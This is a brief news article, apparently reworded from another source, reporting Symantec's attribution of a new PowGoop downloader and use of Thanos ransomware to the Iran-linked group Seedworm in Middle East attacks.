In the part of their attacks on companies and government agencies in the broader Middle East region, an Iranian cyberattack group has begun utilizing new tools, including a custom download utility and commodity ransomware, as per Broadcom’s Symantec division.
Dubbed as Seedworm, the group gives off an impression of being deploying a few variations of a new downloader, known as PowGoop, to the recent targets.
The utilization of the noxious program doesn’t demonstrate a shift to ransomware-based cybercrime for the group, yet rather a reception of a more extensive variety of strategies for countering defensive measures.
The software downloads and decrypts ‘obfuscated’ PowerShell scripts to run on compromised frameworks, utilizing the basic utility as an approach to execute code.
The researchers additionally state that the group is sending ransomware, known as Thanos, which previously appeared available to be purchased not long ago and gives off an impression of being utilized by Seedworm for its ‘destructive capacities’.
“Looking at Seedworm’s history, it is apparent they’ve been focused on Middle East-based government organizations for years,” “We don’t believe that they are directly focused on monetary gain. From our standpoint, the Thanos victim organizations [represent] very few [targets] — just a handful at the most,” says Vikram Thakur, Symantec’s technical director.
The researchers were moderately sure, nonetheless, in ascribing PowGoop to the Iranian state actor.
“Seedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering operations across the Middle East,” Symantec researchers stated in their analysis.
“While the connection between PowGoop and Seedworm remains tentative, it may suggest some retooling on Seedworm’s part. Any organizations that do find evidence of PowGoop on their networks should exercise extreme caution and perform a thorough investigation.”
“There is nothing sophisticated about PowGoop aside from it being custom-made and that it uses multiple layers of encoded PowerShell scripts to effectively download and execute PS-based payloads,” Thakur added later.
PowGoop has additionally been identified by various other companies. Security firm Palo Alto Networks associated PowGoop with two ransomware attacks on companies in the Middle East and North Africa at the beginning of September.
If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.